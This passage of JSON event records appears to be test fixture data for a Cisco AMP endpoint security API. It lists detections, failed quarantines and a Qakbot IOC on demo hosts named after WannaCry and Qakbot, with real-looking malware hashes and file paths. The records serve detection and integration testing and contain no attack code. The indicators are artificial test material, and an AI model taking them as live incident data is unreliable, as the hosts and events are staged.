Failed","event_type_id":2164260893,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831755","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":873000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831753","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qeriuwjhrf","file_path":"\\\\?\\C:\\Windows\\qeriuwjhrf","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":732000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":573000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870786","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"","file_path":"","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239050946806000,"timestamp":1610637528,"timestamp_nanoseconds":587000000,"date":"2021-01-14T15:18:48+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419239046651838535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239046651838000,"timestamp":1610637527,"timestamp_nanoseconds":932000000,"date":"2021-01-14T15:18:47+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419239046651838535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1492807649948000000,"timestamp":1610635719,"timestamp_nanoseconds":948000000,"date":"2021-01-14T14:48:39+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610635719,"start_date":"2021-01-14T14:48:39+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Unknown","file_name":"yuyfhonu.exe","file_path":"/C:/Users/johndoe/AppData/Roaming/Microsoft/Yuyfhonuu/yuyfhonu.exe","identity":{"sha256":"6b7d5fdf4b9d42a985cf861c5ef28f5fa914b418c22e4bf5b56bac12251bcd6c"},"parent":{"disposition":"Clean","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":773000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":664000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":570000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":430000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine 